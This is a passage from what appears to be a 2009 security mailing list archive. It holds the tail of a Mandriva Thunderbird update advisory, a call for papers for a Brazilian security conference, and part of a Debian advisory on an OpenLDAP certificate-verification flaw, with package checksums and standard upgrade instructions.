38e45779d0210d3be2b22aa507cbe5e1 2008.0/i586/mozilla-thunderbird-lt-2.0.0.23-0.1mdv2008.0.i586.rpm 2b14ab01f0554d285a301b84bd8b7946 2008.0/i586/mozilla-thunderbird-mk-2.0.0.23-0.1mdv2008.0.i586.rpm e8e93aaf3faa824addec6e2b11a705aa 2008.0/i586/mozilla-thunderbird-moztraybiff-1.2.3-4.3mdv2008.0.i586.rpm 49af563d0077fa033d29c77bd110780a 2008.0/i586/mozilla-thunderbird-nb_NO-2.0.0.23-0.1mdv2008.0.i586.rpm 9d36070e57a745566cb82b37b4418d06 2008.0/i586/mozilla-thunderbird-nl-2.0.0.23-0.1mdv2008.0.i586.rpm 6326cfb240532d1d0c36dd0f737a19ca 2008.0/i586/mozilla-thunderbird-nn_NO-2.0.0.23-0.1mdv2008.0.i586.rpm 1f820767f442fe1dac47c63735d58cc1 2008.0/i586/mozilla-thunderbird-pa_IN-2.0.0.23-0.1mdv2008.0.i586.rpm 0a9f8b7f88579e59ae8e89c23167c4a0 2008.0/i586/mozilla-thunderbird-pl-2.0.0.23-0.1mdv2008.0.i586.rpm 9455aa4a79ea3237c8c38c3f1732e7f3 2008.0/i586/mozilla-thunderbird-pt_BR-2.0.0.23-0.1mdv2008.0.i586.rpm 0854e002aef3d608c9d088188bca7056 2008.0/i586/mozilla-thunderbird-pt_PT-2.0.0.23-0.1mdv2008.0.i586.rpm 44b816457fbe3b467cec0f9ed43b005f 2008.0/i586/mozilla-thunderbird-ru-2.0.0.23-0.1mdv2008.0.i586.rpm d9b7bccf4672713b529c49e7538f59e1 2008.0/i586/mozilla-thunderbird-sk-2.0.0.23-0.1mdv2008.0.i586.rpm a843d04baee51d51cf45cf5221ef70aa 2008.0/i586/mozilla-thunderbird-sl-2.0.0.23-0.1mdv2008.0.i586.rpm 47211866bd372888dfdd68ae255fc3b5 2008.0/i586/mozilla-thunderbird-sv_SE-2.0.0.23-0.1mdv2008.0.i586.rpm e06ac04c220a6fd67f15458fb8cf3eea 2008.0/i586/mozilla-thunderbird-tr-2.0.0.23-0.1mdv2008.0.i586.rpm 03f676636aff7c109a5bd023783f2de0 2008.0/i586/mozilla-thunderbird-uk-2.0.0.23-0.1mdv2008.0.i586.rpm 0feef3f61e80c0ded71d2b3095184aab 2008.0/i586/mozilla-thunderbird-zh_CN-2.0.0.23-0.1mdv2008.0.i586.rpm 1ddb6b9815e2c089fd8d6a04e8bc086c 2008.0/i586/mozilla-thunderbird-zh_TW-2.0.0.23-0.1mdv2008.0.i586.rpm 37fed4a14fd94d759b1e6d04773787f2 2008.0/i586/nsinstall-2.0.0.23-0.1mdv2008.0.i586.rpm 9969980e9ee1ea09c31f7cffb1e36566 2008.0/SRPMS/mozilla-thunderbird-2.0.0.23-0.1mdv2008.0.src.rpm 7c028fc423e7f7908b3c7403225b016d 2008.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.23-0.1mdv2008.0.src.rpm b600bd052fb38e8f0f02774b8a9b6449 2008.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.23-0.1mdv2008.0.src.rpm 33565089924576c45129657423260c76 2008.0/SRPMS/mozilla-thunderbird-moztraybiff-1.2.3-4.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: a0ccfab937cd6c913cb7c9ea6d1197f1 2008.0/x86_64/mozilla-thunderbird-2.0.0.23-0.1mdv2008.0.x86_64.rpm 66116d8594db3fdb7ba14d595668326e 2008.0/x86_64/mozilla-thunderbird-af-2.0.0.23-0.1mdv2008.0.x86_64.rpm 14f435976705b1ad799f0f4903880c8f 2008.0/x86_64/mozilla-thunderbird-be-2.0.0.23-0.1mdv2008.0.x86_64.rpm f57eefefe61cd2f047a903b14ebfa1df 2008.0/x86_64/mozilla-thunderbird-bg-2.0.0.23-0.1mdv2008.0.x86_64.rpm 7d3b66e519abce3dec3b76995ee490c3 2008.0/x86_64/mozilla-thunderbird-ca-2.0.0.23-0.1mdv2008.0.x86_64.rpm b61fe3aff8aaa20a2181abf0cb8401a1 2008.0/x86_64/mozilla-thunderbird-cs-2.0.0.23-0.1mdv2008.0.x86_64.rpm 58c52b44baf1b491764e649a1a32b83d 2008.0/x86_64/mozilla-thunderbird-da-2.0.0.23-0.1mdv2008.0.x86_64.rpm 867180129ee2c768ac16ed31a16bd543 2008.0/x86_64/mozilla-thunderbird-de-2.0.0.23-0.1mdv2008.0.x86_64.rpm 0b762687748fc0dc87dfbf3162c63353 2008.0/x86_64/mozilla-thunderbird-devel-2.0.0.23-0.1mdv2008.0.x86_64.rpm 877b48ee170f0467b890bc3291bc810b 2008.0/x86_64/mozilla-thunderbird-el-2.0.0.23-0.1mdv2008.0.x86_64.rpm 951eb1c0a9819c3cc33161a7143dde8e 2008.0/x86_64/mozilla-thunderbird-en_GB-2.0.0.23-0.1mdv2008.0.x86_64.rpm 26bd9df1b2d6dffe67e38aa954070657 2008.0/x86_64/mozilla-thunderbird-enigmail-2.0.0.23-0.1mdv2008.0.x86_64.rpm 23e18e13701a0455e3b8bf6db8c3df86 2008.0/x86_64/mozilla-thunderbird-enigmail-ar-2.0.0.23-0.1mdv2008.0.x86_64.rpm ae55846ee4dbc4816ad02b7f0abd3de6 2008.0/x86_64/mozilla-thunderbird-enigmail-ca-2.0.0.23-0.1mdv2008.0.x86_64.rpm 4203a7740a455de3083dae94a4dfc93c 2008.0/x86_64/mozilla-thunderbird-enigmail-cs-2.0.0.23-0.1mdv2008.0.x86_64.rpm b55ae1a0cb827040041de2049bf3e90f 2008.0/x86_64/mozilla-thunderbird-enigmail-de-2.0.0.23-0.1mdv2008.0.x86_64.rpm d653f11d6e4d7c3c2452beccefb7d577 2008.0/x86_64/mozilla-thunderbird-enigmail-el-2.0.0.23-0.1mdv2008.0.x86_64.rpm af0680c4e969cf3f46617dc60f132733 2008.0/x86_64/mozilla-thunderbird-enigmail-es-2.0.0.23-0.1mdv2008.0.x86_64.rpm c4e19b22795a59fd4a9c9f2ebee27974 2008.0/x86_64/mozilla-thunderbird-enigmail-es_AR-2.0.0.23-0.1mdv2008.0.x86_64.rpm d68d2eea33a126bc56c52b11984d0f79 2008.0/x86_64/mozilla-thunderbird-enigmail-fi-2.0.0.23-0.1mdv2008.0.x86_64.rpm 3ab096f4b539a82f1e69a989b89c6a6c 2008.0/x86_64/mozilla-thunderbird-enigmail-fr-2.0.0.23-0.1mdv2008.0.x86_64.rpm aa8ecc477adbcf62a0dd687c5bbb5912 2008.0/x86_64/mozilla-thunderbird-enigmail-hu-2.0.0.23-0.1mdv2008.0.x86_64.rpm 914a78345548dd10b5539e8b667d4a5e 2008.0/x86_64/mozilla-thunderbird-enigmail-it-2.0.0.23-0.1mdv2008.0.x86_64.rpm 39887a3c39bd969cb90625ab015aa52c 2008.0/x86_64/mozilla-thunderbird-enigmail-ja-2.0.0.23-0.1mdv2008.0.x86_64.rpm 3582cbb58ae538a0d09045e917fbca78 2008.0/x86_64/mozilla-thunderbird-enigmail-ko-2.0.0.23-0.1mdv2008.0.x86_64.rpm 6a88528390de8f7d7091c6d293fa22a0 2008.0/x86_64/mozilla-thunderbird-enigmail-nb-2.0.0.23-0.1mdv2008.0.x86_64.rpm a86c9baac8d3d462b176787046f08303 2008.0/x86_64/mozilla-thunderbird-enigmail-nl-2.0.0.23-0.1mdv2008.0.x86_64.rpm d0169e0635adb30faf7f332f16194b3e 2008.0/x86_64/mozilla-thunderbird-enigmail-pl-2.0.0.23-0.1mdv2008.0.x86_64.rpm 997519bfe10c4b25b653f8e7d3d0cd70 2008.0/x86_64/mozilla-thunderbird-enigmail-pt-2.0.0.23-0.1mdv2008.0.x86_64.rpm 9ca0564635276dbde30057c4bff7af7e 2008.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-2.0.0.23-0.1mdv2008.0.x86_64.rpm 6f0dbf7a702b9c87182c48b1a9fe4cd6 2008.0/x86_64/mozilla-thunderbird-enigmail-ro-2.0.0.23-0.1mdv2008.0.x86_64.rpm a75e0dad9925f847499baa83c89da56b 2008.0/x86_64/mozilla-thunderbird-enigmail-ru-2.0.0.23-0.1mdv2008.0.x86_64.rpm 40a278f1357beac324c38f788199fee8 2008.0/x86_64/mozilla-thunderbird-enigmail-sk-2.0.0.23-0.1mdv2008.0.x86_64.rpm e344bd5cc16421623eb48e1e5395c599 2008.0/x86_64/mozilla-thunderbird-enigmail-sl-2.0.0.23-0.1mdv2008.0.x86_64.rpm 4ce08f0b9cfa526237aa1c720444ea5c 2008.0/x86_64/mozilla-thunderbird-enigmail-sv-2.0.0.23-0.1mdv2008.0.x86_64.rpm e6fb9247e023c76086fe36f8afbd9402 2008.0/x86_64/mozilla-thunderbird-enigmail-tr-2.0.0.23-0.1mdv2008.0.x86_64.rpm 54964b7ebefb29a570da744d96afa54f 2008.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-2.0.0.23-0.1mdv2008.0.x86_64.rpm 59b6eb8b60e7cf5319f7364559b4cb27 2008.0/x86_64/mozilla-thunderbird-enigmail-zh_TW-2.0.0.23-0.1mdv2008.0.x86_64.rpm 5406a6947a386c63c5e78066ca258bd8 2008.0/x86_64/mozilla-thunderbird-es_AR-2.0.0.23-0.1mdv2008.0.x86_64.rpm a76272d0e7f443ea5efa80f670b606e5 2008.0/x86_64/mozilla-thunderbird-es_ES-2.0.0.23-0.1mdv2008.0.x86_64.rpm c99a97b21b239e44fd066217662ec71b 2008.0/x86_64/mozilla-thunderbird-et_EE-2.0.0.23-0.1mdv2008.0.x86_64.rpm b5d6cc20ade4906d73a71754d9e4cd34 2008.0/x86_64/mozilla-thunderbird-eu-2.0.0.23-0.1mdv2008.0.x86_64.rpm 1eca8d4c8fb5d0725c2ce3c2920c2592 2008.0/x86_64/mozilla-thunderbird-fi-2.0.0.23-0.1mdv2008.0.x86_64.rpm 4cc9fff16b76a67e93473483f43ff871 2008.0/x86_64/mozilla-thunderbird-fr-2.0.0.23-0.1mdv2008.0.x86_64.rpm b84e61460bfd278a4ccb7e090349cb3d 2008.0/x86_64/mozilla-thunderbird-gu_IN-2.0.0.23-0.1mdv2008.0.x86_64.rpm aac487c6eb35e9b578aa17a971dda834 2008.0/x86_64/mozilla-thunderbird-he-2.0.0.23-0.1mdv2008.0.x86_64.rpm d5933b8f59c6ae42179b489d9eabee0c 2008.0/x86_64/mozilla-thunderbird-hu-2.0.0.23-0.1mdv2008.0.x86_64.rpm 0892f397ff6ff23e36f7b1b8fa6c8fdc 2008.0/x86_64/mozilla-thunderbird-it-2.0.0.23-0.1mdv2008.0.x86_64.rpm 10caef8eed4a2375307f7ebb60355158 2008.0/x86_64/mozilla-thunderbird-ja-2.0.0.23-0.1mdv2008.0.x86_64.rpm 2d3641e3e3ea4d7f0e7d44b35afd0506 2008.0/x86_64/mozilla-thunderbird-ko-2.0.0.23-0.1mdv2008.0.x86_64.rpm 03976b1bcb3bb51779158f9486bdc24f 2008.0/x86_64/mozilla-thunderbird-lt-2.0.0.23-0.1mdv2008.0.x86_64.rpm d54028c7129170781ed5c60b8392d1d8 2008.0/x86_64/mozilla-thunderbird-mk-2.0.0.23-0.1mdv2008.0.x86_64.rpm 00728fa9d003818a06dcd6f740dbc097 2008.0/x86_64/mozilla-thunderbird-moztraybiff-1.2.3-4.3mdv2008.0.x86_64.rpm 84e1f697a54bd79516dcaf5fb60dfa90 2008.0/x86_64/mozilla-thunderbird-nb_NO-2.0.0.23-0.1mdv2008.0.x86_64.rpm 2078725a34f923e54cce0bd425db6795 2008.0/x86_64/mozilla-thunderbird-nl-2.0.0.23-0.1mdv2008.0.x86_64.rpm 7265b7ad804464c50d4ca30692c2e809 2008.0/x86_64/mozilla-thunderbird-nn_NO-2.0.0.23-0.1mdv2008.0.x86_64.rpm 6218ab8705c4c73558bf4f9d5dd38a7d 2008.0/x86_64/mozilla-thunderbird-pa_IN-2.0.0.23-0.1mdv2008.0.x86_64.rpm ab1f57f3f2d22652111634ff5fe7cac5 2008.0/x86_64/mozilla-thunderbird-pl-2.0.0.23-0.1mdv2008.0.x86_64.rpm b06220ea34127346e94e6480c619c57e 2008.0/x86_64/mozilla-thunderbird-pt_BR-2.0.0.23-0.1mdv2008.0.x86_64.rpm fdb9a5a410719cd9ca07c2ec11ce2cd5 2008.0/x86_64/mozilla-thunderbird-pt_PT-2.0.0.23-0.1mdv2008.0.x86_64.rpm 2a9d43b30f1904b5cc6e54a4101a406f 2008.0/x86_64/mozilla-thunderbird-ru-2.0.0.23-0.1mdv2008.0.x86_64.rpm 8d96337ed85bfd647744ac53132abfbe 2008.0/x86_64/mozilla-thunderbird-sk-2.0.0.23-0.1mdv2008.0.x86_64.rpm 2f75f3cb85bbe29704bc89ebcedd6129 2008.0/x86_64/mozilla-thunderbird-sl-2.0.0.23-0.1mdv2008.0.x86_64.rpm 88da92de088880f49fea5df81258a1cf 2008.0/x86_64/mozilla-thunderbird-sv_SE-2.0.0.23-0.1mdv2008.0.x86_64.rpm c11f047f3e67025b2385be92c7e7f517 2008.0/x86_64/mozilla-thunderbird-tr-2.0.0.23-0.1mdv2008.0.x86_64.rpm 7d7983c13742c5a440ec5bddf6d27b50 2008.0/x86_64/mozilla-thunderbird-uk-2.0.0.23-0.1mdv2008.0.x86_64.rpm ef6d24e0be72719752989cf7d2605d55 2008.0/x86_64/mozilla-thunderbird-zh_CN-2.0.0.23-0.1mdv2008.0.x86_64.rpm a9ea450120fa5239b71f40c2e00be112 2008.0/x86_64/mozilla-thunderbird-zh_TW-2.0.0.23-0.1mdv2008.0.x86_64.rpm 902522860507206b0fc22a84077deafd 2008.0/x86_64/nsinstall-2.0.0.23-0.1mdv2008.0.x86_64.rpm 9969980e9ee1ea09c31f7cffb1e36566 2008.0/SRPMS/mozilla-thunderbird-2.0.0.23-0.1mdv2008.0.src.rpm 7c028fc423e7f7908b3c7403225b016d 2008.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.23-0.1mdv2008.0.src.rpm b600bd052fb38e8f0f02774b8a9b6449 2008.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.23-0.1mdv2008.0.src.rpm 33565089924576c45129657423260c76 2008.0/SRPMS/mozilla-thunderbird-moztraybiff-1.2.3-4.3mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF6jKmqjQ0CJFipgRAu1SAKDi2SF68hKio1tPgXHRo1UOR+9y9gCeK2dV dJRE8VVmjiMdN4K6a+8ExHs= =pIBk -----END PGP SIGNATURE----- From le at ysts.org Wed Dec 2 20:50:01 2009 From: le at ysts.org (Luiz Eduardo) Date: Wed, 2 Dec 2009 12:50:01 -0800 Subject: [Full-disclosure] Call for Papers - you Sh0t the Sheriff 4 - Security Conference, Brazil Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello Full-Disclosure, The call for papers for the yStS (you Sh0t the Sheriff) conference is now open! The 4th edition will be, once again, held in Sao Paulo, Brazil, on May 17th, 2010. INTRODUCTION you sh0t the Sheriff is a very unique event dedicated to bringing cutting edge topics to the top-notch Information Security Community in Brazil. yStS mixes the highest quality presentations and speakers from all over the globe, covering diverse topics in information security. Our goal is to help attendees understand the current state of the information security world by mixing professionals and topics from different Infosec segments of the market. For the most part, yStS is an invite-only event. So, submitting a talk is certainly a good hack to try to be there, especially if you're local. Due to the success of previous years' editions, yes, we're keeping the same format: * Kicked-back and cool environment * YSTS 4 will be held at an almost secret location (only announced to whom it may concern a couple of weeks before the con) * and, once again, this secret location will be, most likely, a club or a bar * and yes, we have (some) food and (lots of) drinks CONFERENCE TOPICS The focus for YSTS 4 is anything related to InfoSec, including (but not limited to): * Operating Systems * Career and Management topics * Mobile Devices/Embedded Systems * Information Security Audit and Control * Social Networking * Information Security Policies * Messing with Protocols * Networking/Telecommunication * Wireless and all RF related stuff * Incident Response & other applicable (and useful) Infosec Policies * Information Warfare * Malware/ BotNets * User awareness/ Social Networking Threats * Secure Programming * Hacker Spaces/ hacker community * Fuzzing * Physical Security * Virtualization * Webapp Security * "the" Cloud * Cryptography / Obfuscation * Infrastructure and Critical Systems * Caipirinha and Beer Hacks * and everything else security related you might think would be good for the conference We do like shorter talks, so, please submit your talks and remember they must be 30 minutes long. The new thing for this year is that we also are opened to some 15-minute talks. Some of the smart people around might not need 30 minutes to deliver a message, or it might be a project that has been just kicked-off. 15 minutes might be your thing and that's nothing to be ashamed about. you Sh0t the Sheriff is the perfect conference to release your new projects, trust us. And yes, we do prefer new stuff and "first-time" speakers are more than welcome. If you got good stuff to speak about, that's all that matters. SPEAKER PRIVILEGES (applies only to the 30 minute-long talks) * USD 1,000.00 to help covering travel expenses for international speakers * Breakfast, lunch and dinner during conference * After-conference official party (and the unofficial ones) * Auditing products in traditional Brazilian barbecue restaurants * Life-time free admission for all future yStS conferences (yes, if you 've spoken before at yStS, you have your free-entry guaranteed, just buy us a beer, ohh, wait, it's free anyways, isn't it?) CFP SUBMISSION Each paper submission must include the following information: * Name, title, address, email and phone/contact number * Short biography and qualification * Speaking experience * Do you need or have a visa to come to Brasil? * Summary or abstract for your presentation * is it a 30 minute or a 15 minute talk? * Technical requirements (others than LCD Projector) * Other publications or conferences where this material has been or will be published/submitted. We do accept submissions in English, Portuguese or Spanish. IMPORTANT DATES Final CFP Submission - February 28th, 2010 Final Notification of Acceptance - March 20th, 2010 Final Material Submission for accepted presentations - May 5th, 2010 Please send your talk submission to cfp/at/ysts.org CONTACT INFORMATION Paper Submissions: cfp/at/ysts.org General Inquiries: b0ard/at/ysts.org Sponsorship Inquiries: sponsors/at/ysts.org OTHER STUFF Check our archives session, including the videos, at www.ysts.org We hope to see you there! Luiz Eduardo & Nelson Murilo & Willian Caprino http://www.ysts.org -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8 wj8DBQFLFtLXgo//xpeLCaoRAt9KAJ0RNt0N4ZxiDMiG/r9PCWGcYcDyJwCg+Gkn 62mQcZWLl3024vnWbCPJtYI= =5/ko -----END PGP SIGNATURE----- From iuculano at debian.org Wed Dec 2 21:45:40 2009 From: iuculano at debian.org (Giuseppe Iuculano) Date: Wed, 02 Dec 2009 22:45:40 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1943-1] New openldap2.3/openldap packages fix SSL certificate verification weakness Message-ID: <4B16E004.4090903@debian.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1943 security at debian.org http://www.debian.org/security/ Giuseppe Iuculano December 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Packages : openldap openldap2.3 Vulnerability : insufficient input validation Problem type : remote Debian-specific: no Debian bug : 553432 CVE ID : CVE-2009-3767 It was discovered that OpenLDAP, a free implementation of the Lightweight Directory Access Protocol, when OpenSSL is used, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority. For the oldstable distribution (etch), this problem has been fixed in version 2.3.30-5+etch3 for openldap2.3. For the stable distribution (lenny), this problem has been fixed in version 2.4.11-1+lenny1 for openldap. For the testing distribution (squeeze), and the unstable distribution (sid), this problem has been fixed in version 2.4.17-2.1 for openldap. We recommend that you upgrade your openldap2.3/openldap packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30.orig.tar.gz Size/MD5 checksum: 2971126 c40bcc23fa65908b8d7a86a4a6061251 http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30-5+etch3.dsc Size/MD5 checksum: 1214 36efc1cf2a98c54d4b1da0910e273843 http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30-5+etch3.diff.gz Size/MD5 checksum: 315058 310ce752b78ff3227d78dcd8c1bd60a5 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_alpha.deb Size/MD5 checksum: 293108 2172048d5f8b8b7f379b3414fc5c2e37 http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_alpha.deb Size/MD5 checksum: 1280772 ab65f162a40607c1787f9b03783a7563 http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_alpha.deb Size/MD5 checksum: 193768 602a6da790648dd8b0af7d9f386b5c6e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_amd64.deb Size/MD5 checksum: 285554 42480b47018eb1d70b9e62d05b925a5b http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_amd64.deb Size/MD5 checksum: 1244570 b88256f8259516b09c51f166ff6b4aea http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_amd64.deb Size/MD5 checksum: 184652 716cc53985a031d1fe03fede778d6ae5 arm architecture (ARM) http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_arm.deb Size/MD5 checksum: 1190314 8686c6a9a9240e6113f92c8bb20d7e1a http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_arm.deb Size/MD5 checksum: 254828 49d9c9a250fb4a5a828de5791ee92380 http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_arm.deb Size/MD5 checksum: 155876 bb45d3104fe4b9811fdb3063da42d3b1 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_hppa.deb Size/MD5 checksum: 1307146 698d7416e4cc544522ce2e25ac9c0fce http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_hppa.deb Size/MD5 checksum: 292798 eb9d6d19560a1153cc58ccae3f354a4e http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_hppa.deb Size/MD5 checksum: 182568 caade74265ee9d7b8ac77c844c23b413 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_i386.deb Size/MD5 checksum: 1177552 f3ccf11b82474593af5e30a272f9edb9 http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_i386.deb Size/MD5 checksum: 148744 168e58797e74f9b3b6d3c337b6369ca7 http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_i386.deb Size/MD5 checksum: 266538 3be52b8402d06913624a3e808be58ecb ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_ia64.deb Size/MD5 checksum: 239248 78d1537b3a106824ff5d076e828a0312 http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_ia64.deb Size/MD5 checksum: 379904 dbc96e1a44dce4bb5f79b9c043823293 http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_ia64.deb Size/MD5 checksum: 1660854 fcc2873ffd50e45c956d9bcc81d83c51 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_mips.deb Size/MD5 checksum: 258210 298f5a83a1efd8c035644fd58df21f2c http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_mips.deb Size/MD5 checksum: 185598 b6c67ee072f2de03820e7ce11edb39c3 http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_mips.deb Size/MD5 checksum: 1205768 3f312958af5ea129384513e5fab72208 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_mipsel.deb Size/MD5 checksum: 258852 d7ba57787989e3fb5035fce34b04965d http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_mipsel.deb Size/MD5 checksum: 187100 46910e3923926ac060c13a7a53f8cac4 http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_mipsel.deb Size/MD5 checksum: 1188878 5698884b42d7206c2b0c134602861354 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_powerpc.deb Size/MD5 checksum: 188914 e03855167b8e13bdb72e47baa9644f86 http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_powerpc.deb Size/MD5 checksum: 272378 f5741b7ac8f4172e7481f5c2e699231b http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_powerpc.deb Size/MD5 checksum: 1243754 2a8b933e956e5ac4bc29028688bb09ec s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_s390.deb Size/MD5 checksum: 291822 6b47ac5b7fbc269c1973c494d5dadbc2 http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_s390.deb Size/MD5 checksum: 168716 f72b023d98d61565c624f7acbf953baf http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_s390.deb Size/MD5 checksum: 1241532 0167eb506b063de5435181f40c6cf809 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_sparc.deb Size/MD5 checksum: 1177712 770a58d0c60ad11e5ca4cf25159fe2c7 http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_sparc.deb Size/MD5 checksum: 153682 d8bf20f2a94456451d4ea29d3237d280 http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_sparc.deb Size/MD5 checksum: 258560 4bfd77d56852608813f158ecfd91b42b Debian GNU/Linux 5.0 alias lenny - -------------------------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/o/openldap/openldap_2.4.11-1+lenny1.diff.gz Size/MD5 checksum: 148075 024b717169f42734ee5650ebe2978631 http://security.debian.org/pool/updates/main/o/openldap/openldap_2.4.11-1+lenny1.dsc Size/MD5 checksum: 1831 ca4cb86b4847a59f95275ff2f4d0e173 http://security.debian.org/pool/updates/main/o/openldap/openldap_2.4.11.orig.tar.gz Size/MD5 checksum: 4193523 d4e8669e2c9b8d981e371e97e3cf92d9 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_alpha.deb Size/MD5 checksum: 3624752 5b4e467360ecd8cc897b03b5aca57dad http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_alpha.deb Size/MD5 checksum: 205526 3b083869976ab4d8d8df69d27fe9480e http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_alpha.deb Size/MD5 checksum: 280526 4ed333757fef7e98d89c5edda6589b04 http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_alpha.deb Size/MD5 checksum: 1537448 98d6aeab748560a491e0b526d930fc0c http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_alpha.deb Size/MD5 checksum: 1013148 cc656603f7ae0eacc2b3c22dd1fae967 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_alpha.deb Size/MD5 checksum: 285128 e526e547a4af2c13bf3ae90dfdf023a2 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_amd64.deb Size/MD5 checksum: 1493300 31c077d63cc2ff159927939cadb29808 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_amd64.deb Size/MD5 checksum: 299612 e148216f77a9136adb19acd8df026d6d http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_amd64.deb Size/MD5 checksum: 267470 f903f46433faa1d2b6b203e50aaed3d8 http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_amd64.deb Size/MD5 checksum: 881074 de337737dd93af0b81bd90e3c6f23377 http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_amd64.deb Size/MD5 checksum: 3664994 8ad4581bd54e1ed7a8f3c1c8bf210c17 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_amd64.deb Size/MD5 checksum: 204896 c0dba3b62aa14392d29f831d6c87206d arm architecture (ARM) 